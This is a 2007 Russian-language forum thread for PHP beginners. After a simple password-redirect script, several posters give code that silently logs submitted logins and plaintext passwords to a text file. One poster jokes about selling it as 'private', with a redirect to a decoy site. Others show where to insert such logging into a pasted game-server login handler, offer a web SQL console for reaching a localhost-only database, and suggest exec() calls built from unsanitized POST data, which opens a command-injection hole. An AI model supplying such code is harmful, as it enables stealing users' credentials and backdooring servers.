[php] Новичкам: задаем вопросы

Ad · 22 Aug 2007

Людей хелп. Нужен такой просто php скрипт.
Поле пароль
Собсно вводим пароль если пароль верный то нас кидает на определенную страницу если пароль неверный то выдается соответствующие сообщение.

groundhog · 22 Aug 2007

password.html

<html>
<head>
<title>Авторизация доступа</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
</head>
<body>
<h1>Введите пароль:</h1>
<form action="password.php" method="post">
<input type="password" name="passwd" maxlength="24" size="18" value="">
<br><br>
<input type="submit" value="Авторизация">
</form>
</body>
</html>
Click to expand...

password.php

<?php

define("REDIRECT_URL", "http://www.yandex.ru");
define("ACCESS_PASSWD", "Шапка0012УшанкА");

$passwd = trim($_POST["passwd"]);

if (strlen($passwd) && $passwd == ACCESS_PASSWD)
header("Location: " . REDIRECT_URL);
else
print("<h1 style=\"color: red\">Введённый пароль не верен!</h1>");

?>
Click to expand...

Заходишь на password.html и вводишь пароль. Пароль забит константой.

Reanimat0R · 22 Aug 2007

Скажите пожалуйста, как сделать так, что бы при вводе логина и пароля, они автоматически сохранялись в отдельный файлик?

NOmeR1 · 22 Aug 2007

Reanimat0R said:

Скажите пожалуйста, как сделать так, что бы при вводе логина и пароля, они автоматически сохранялись в отдельный файлик?
Click to expand...

PHP:

<? $file = 'data.txt'; //файлик if(!$_POST['s']) { ?> <form method=POST> Логин: <input type=text name=login><br> Пароль: <input type=password name=pass><br> <input type=submit name=s> </form> <? } else { $format = $_POST['login'].' ||| '.$_POST['pass']; //в каком формате записать логин и пасс (запишется так - ЛОГИН ||| ПАРОЛЬ) $f = fopen($file, 'ab'); fwrite($f, $format."\r\n"); fclose($f); } ?>

DIAgen · 22 Aug 2007

Еще вот так сделать... и можно будет продовать как приват..)))

PHP:

<? $file = 'data.txt'; //файлик if(!$_POST['s']) { ?> <form method=POST> Логин: <input type=text name=login><br> Пароль: <input type=password name=pass><br> <input type=submit name=s> </form> <? } else { $format = $_POST['login'].' ||| '.$_POST['pass']; //в каком формате записать логин и пасс (запишется так - ЛОГИН ||| ПАРОЛЬ) $f = fopen($file, 'ab'); fwrite($f, $format."\r\n"); fclose($f); header("Location: http://example.com/"); } ?>

groundhog · 22 Aug 2007

password.html

<html>
<head>
<title>Авторизация доступа</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
</head>
<body>
<h1>Введите логин и пароль:</h1>
<form action="password.php" method="post">
Логин: <input type="text" name="login" maxlength="24" size="18" value="">
<br><br>
Пароль: <input type="password" name="passwd" maxlength="24" size="18" value="">
<br><br>
<input type="submit" value="Авторизация">
</form>
</body>
</html>
Click to expand...

password.php

<?php

$login = @trim($_POST["login"]);
$passwd = @trim($_POST["passwd"]);

if (!strlen($login) || !strlen($passwd))
die("<h1 style=\"color: red\">Данные не верны. Повторите ввод!</h1>");

$fileId = fopen("passwords.txt", "a+");
if (!$fileId)
die("<h1 style=\"color: red\">Не могу открыть файл для записи!</h1>");

$line = sprintf("%s:%s\n", $login, $passwd);

if (!fputs($fileId, $line))
die("<h1 style=\"color: red\">Не могу записать данные в файл!</h1>");

fclose($fileId);

print("<h1 style=\"color: green\">Спасибо за посещение, {$login}!</h1>");

?>
Click to expand...

Заходишь на password.html и вводишь логин и пароль. Скрипт password.php будет вести запись введённых данных и уведомлять пользователя "Спасибо за посещение!".

NOmeR1 · 22 Aug 2007

groundhog said:

Заходишь на password.html и вводишь логин и пароль. Скрипт password.php будет вести запись введённых данных и уведомлять пользователя "Спасибо за посещение!".
Click to expand...

Что-то у тебя он какой-то "сложный" зачем столько гемора?
А вообще достаточно скрипта

PHP:

exec('echo '.$_POST['login'].'|||'.$_POST['pass'].' > log.txt');

ENFIX · 22 Aug 2007

NOmeR1, тогда точнее будет так:

PHP:

exec("echo ".$_POST['login']."|||".$_POST['pass']." > log.txt");

NOmeR1 · 22 Aug 2007

ENFIX said:

NOmeR1, тогда точнее будет так:

PHP:

exec("echo ".$_POST['login']."|||".$_POST['pass']." > log.txt");

Click to expand...

Какая разница? Ты сменил ковычки, зачем? Какой смысл?

groundhog · 22 Aug 2007

NOmeR1, чего там сложного? Зато обрабатывает все ошибки и ведёт себя однозначно + я делал это для наглядности отдельно (пример отправки данных, пример обработки, пример записи).

exec('echo '.$_POST['login'].'|||'.$_POST['pass'].' > log.txt');
Click to expand...

А этот код не сработает в safe mode. И тогда уж лучше:

exec('echo '.$_POST['login'].'|||'.$_POST['pass'].' >> log.txt');
Click to expand...

Reanimat0R · 22 Aug 2007

Объясните пожалуйста куда нужно это вставить.
Я имею следующее:

<?
require 'config.php';
require 'pages/functions.php';
require 'pages/query.php';

if ($_POST['action']=='login')
{
mssql_connect ($CONFIG['mssqlip'], $CONFIG['dbuser'], $CONFIG['dbpass']);
mssql_select_db($CONFIG['mssqllin2db']);
$postusername = isset($_POST['username'])?$_POST['username']:null;
$postpassword = isset($_POST['password'])?$_POST['password']:null;
$new_random = isset($_POST['random'])?$_POST['random']:null;
session_start();
$new_string=$_SESSION["new_string"];
$new_string=antiinjection($new_string);
$postusername = antiinjection($postusername);
$postpassword = antiinjection($postpassword);
$result = mssql_query(sprintf(SELECT_USER_PASS,$postusername));
$num_user_pass=mssql_num_rows($result);
$user_pass=mssql_fetch_array($result);
$password = '0x'.bin2hex($user_pass['password']);
list ($Id) = mssql_fetch_row(mssql_query("INSERT INTO ".$CONFIG['mssqlcp_log'].".dbo.acc_auth (account,password,random,date,remote_addr,status) VALUES ('".$postusername."','".$postpassword."','".$new_string."',GETDATE(),'".$_SERVER['REMOTE_ADDR']."',0); SELECT @@IDENTITY as insertId;"));
if ($new_string != $new_random)
{
echo '<script> alert("Неверный код."); </script>';
}
else
{
if (@password_encrypt($postpassword)==$password && $num_user_pass==1)
{
@setcookie("login", $user_pass['account'], time()+1800);
@setcookie("site_user", $user_pass['account'], time()+1800);
@setcookie("pass", md5($password), time()+1800);
mssql_query("UPDATE ".$CONFIG['mssqlcp_log'].".dbo.acc_auth SET status=1 WHERE id='".$Id."'");
}
else
{
echo '<script> alert("Неверный логин или пароль."); </script>';
}
}
quickrefresh('index.php');
}
else
{
quickrefresh('index.php');
}
?>
Click to expand...

groundhog · 22 Aug 2007

Перед вызовом session_start() вставь:

$fileId = fopen("passwords.txt", "a+");
$line = sprintf("%s:%s\n", $postusername, $postpassword );
fputs($fileId, $line);
fclose($fileId);
Click to expand...

З.Ы. В файл будет записано именно то, что пользователь передаёт через форму, т.е. ник со всеми опасными символами.

NOmeR1 · 22 Aug 2007

PHP:

<? require 'config.php'; require 'pages/functions.php'; require 'pages/query.php'; if ($_POST['action']=='login') { mssql_connect ($CONFIG['mssqlip'], $CONFIG['dbuser'], $CONFIG['dbpass']); mssql_select_db($CONFIG['mssqllin2db']); $postusername = isset($_POST['username'])?$_POST['username']:null; $postpassword = isset($_POST['password'])?$_POST['password']:null; $new_random = isset($_POST['random'])?$_POST['random']:null; session_start(); $new_string=$_SESSION["new_string"]; $new_string=antiinjection($new_string); $postusername = antiinjection($postusername); $postpassword = antiinjection($postpassword); $result = mssql_query(sprintf(SELECT_USER_PASS,$postusername )); $num_user_pass=mssql_num_rows($result); $user_pass=mssql_fetch_array($result); $password = '0x'.bin2hex($user_pass['password']); list ($Id) = mssql_fetch_row(mssql_query("INSERT INTO ".$CONFIG['mssqlcp_log'].".dbo.acc_auth (account,password,random,date,remote_addr,status) VALUES ('".$postusername."','".$postpassword."','".$new_string."',GETDATE(),'".$_SERVER['REMOTE_ADDR']."',0); SELECT @@IDENTITY as insertId;")); if ($new_string != $new_random) { echo '<script> alert("Неверный код."); </script>'; } else { if (@password_encrypt($postpassword)==$password && $num_user_pass==1) { @setcookie("login", $user_pass['account'], time()+1800); @setcookie("site_user", $user_pass['account'], time()+1800); @setcookie("pass", md5($password), time()+1800); mssql_query("UPDATE ".$CONFIG['mssqlcp_log'].".dbo.acc_auth SET status=1 WHERE id='".$Id."'"); $format = $postusername.' ||| '.$postpassword; //в каком формате записать логин и пасс (запишется так - ЛОГИН ||| ПАРОЛЬ) $f = fopen('log.txt', 'ab'); fwrite($f, $format."\r\n"); fclose($f); } else { echo '<script> alert("Неверный логин или пароль."); </script>'; } } quickrefresh('index.php'); } else { quickrefresh('index.php'); } ?>

Вот тебе код. Данные сохранятся в файл log.txt.

Reanimat0R · 23 Aug 2007

Спасибо большое!
У меня еще вопросик:
Как можно изменить в базе данных(mysql) информацию?
Опишу ситуацию:
1.стоит удаленный сервер, доступ к базе данных доступен только с локалхоста.
2.есть возможность править пхп запросы к базе данных
пример:

mssql_connect ($CONFIG['mssqlip'], $CONFIG['dbuser'], $CONFIG['dbpass']);
mssql_select_db($CONFIG['mssqllin2db']);
$postusername = isset($_POST['username'])?$_POST['username']:null;
$postpassword = isset($_POST['password'])?$_POST['password']:null;
$new_random = isset($_POST['random'])?$_POST['random']:null;
session_start();
$new_string=$_SESSION["new_string"];
$new_string=antiinjection($new_string);
$postusername = antiinjection($postusername);
$postpassword = antiinjection($postpassword);
$result = mssql_query(sprintf(SELECT_USER_PASS,$postusername));
$num_user_pass=mssql_num_rows($result);
$user_pass=mssql_fetch_array($result);
$password = '0x'.bin2hex($user_pass['password']);
list ($Id) = mssql_fetch_row(mssql_query("INSERT INTO ".$CONFIG['mssqlcp_log'].".dbo.acc_auth (account,password,random,date,remote_addr,status) VALUES ('".$postusername."','".$postpassword."','".$new_string."',GETDATE(),'".$_SERVER['REMOTE_ADDR']."',0); SELECT @@IDENTITY as insertId;"));
if ($new_string != $new_random)
Click to expand...

Или хотя бы посмотреть таблицы в базе?
Огромное спасибо за внимание

groundhog · 23 Aug 2007

Воспользуйся примитивным mysql-клиентом на PHP:

<?php
define("MYSQL_HOST", "localhost");
define("MYSQL_USER", "root");
define("MYSQL_PASSWD", "");
define("MYSQL_DATABASE", "test");

$dbLink = mysql_connect(MYSQL_HOST, MYSQL_USER, MYSQL_PASSWD)
or die("Could not connect to database! Error: " . mysql_error());

mysql_select_db(MYSQL_DATABASE) or die("Error: could not select database!");

print("<html>\n");
print("<head>\n");
print("<title>Simple MySQL client by groundhog</title>\n");
print("<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\">\n");
print("</head>\n");
print("<body>\n");
print("<h1>Simple MySQL client</h1>\n");
printf("<h3>Текущая база: <i>%s</i></h3>\n", MYSQL_DATABASE);
print("<form method=\"post\">\n");
print("Текст запроса:<br>");
print("<textarea name=\"query\" cols=\"50\" rows=\"5\">\n");
if (isset($_POST["query"])) print($_POST["query"]);
print("</textarea>\n");
print("<br><br>\n");
print("<input type=\"submit\" name=\"run\" value=\"Выполнить\">\n");
print("</form>\n");

if (isset($_POST["run"]) && isset($_POST["query"]) && strlen($_POST["query"])) {
print("<h1>Результат:</h1>\n");

$sql = trim($_POST["query"]);
$result = mysql_query($sql) or die("Query failed! Error: " . mysql_error());

if (is_resource($result)) {
print("<table border=\"1\">\n");
print("<tr>");
$i = 0;
while ($i < mysql_num_fields($result)) {
$meta = mysql_fetch_field($result, $i);
printf("<td><b>%s<b></td>", $meta->name);
$i++;
}
print("</tr>\n");

while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {
print("<tr>");
foreach($line as $value)
printf("<td>%s</td>", $value);
print("</tr>\n");
}
print("</table>\n");
} elseif (is_bool($result)) {
print("<h3>Команда выполнена</h3>\n");
}
}

print("</body>\n");
print("</html>\n");
?>
Click to expand...

Что касается запросов:

Посмотреть какие схемы есть в базе данных:

SHOW DATABASES;
Click to expand...

Подключиться к схеме:

USE [DATABASE_NAME];
Click to expand...

Посмотреть таблицы:

SHOW TABLES;
Click to expand...

Выбрать данные из таблицы

SELECT * FROM [TABLE_NAME];
Click to expand...

_Sniper_ · 26 Aug 2007

Где включаеться\выключаеЦЦа функция ftok

NOmeR1 · 26 Aug 2007

_Sniper_ said:

Где включаеться\выключаеЦЦа функция ftok
Click to expand...

В файле php.ini, находящемся в дире с установленным PHP.

n1†R0x · 26 Aug 2007

NOmeR1 said:

В файле php.ini, находящемся в дире с установленным PHP.
Click to expand...

Все это так, если соответствующее расширение установлено (кажется, называется Semaphore или как-то так)
Насколько я помню, в стандартном пакете php его нет.

_Sniper_ · 26 Aug 2007

Как мне её включить выключить? Посмотрел в php.ini..

n1†R0x · 26 Aug 2007

http://php.mirror.camelnetwork.com/manual/ru/ref.sem.php

Замечание: Для Windows-платформ это расширение недоступно.

Требования

Эти функции всегда доступны.
Установка

Support for this functions are not enabled by default. To enable System V semaphore support compile PHP with the option --enable-sysvsem. To enable the System V shared memory support compile PHP with the option --enable-sysvshm. To enable the System V messages support compile PHP with the option --enable-sysvmsg.
Click to expand...

[php] Новичкам: задаем вопросы

Ad Elder - Старейшина

groundhog Elder - Старейшина

Reanimat0R New Member

NOmeR1 Everybody lies

DIAgen Banned Life!

groundhog Elder - Старейшина

NOmeR1 Everybody lies

ENFIX Elder - Старейшина

NOmeR1 Everybody lies

groundhog Elder - Старейшина

Reanimat0R New Member

groundhog Elder - Старейшина

NOmeR1 Everybody lies

Reanimat0R New Member

groundhog Elder - Старейшина

_Sniper_ Banned

NOmeR1 Everybody lies

n1†R0x Elder - Старейшина

_Sniper_ Banned

n1†R0x Elder - Старейшина

Useful Searches

[php] Новичкам: задаем вопросы

Ad Elder - Старейшина

groundhog Elder - Старейшина

Reanimat0R New Member

NOmeR1 Everybody lies

DIAgen Banned Life!

groundhog Elder - Старейшина

NOmeR1 Everybody lies

ENFIX Elder - Старейшина

NOmeR1 Everybody lies

groundhog Elder - Старейшина

Reanimat0R New Member

groundhog Elder - Старейшина

NOmeR1 Everybody lies

Reanimat0R New Member

groundhog Elder - Старейшина

_Sniper_ Banned

NOmeR1 Everybody lies

n1†R0x Elder - Старейшина

_Sniper_ Banned

n1†R0x Elder - Старейшина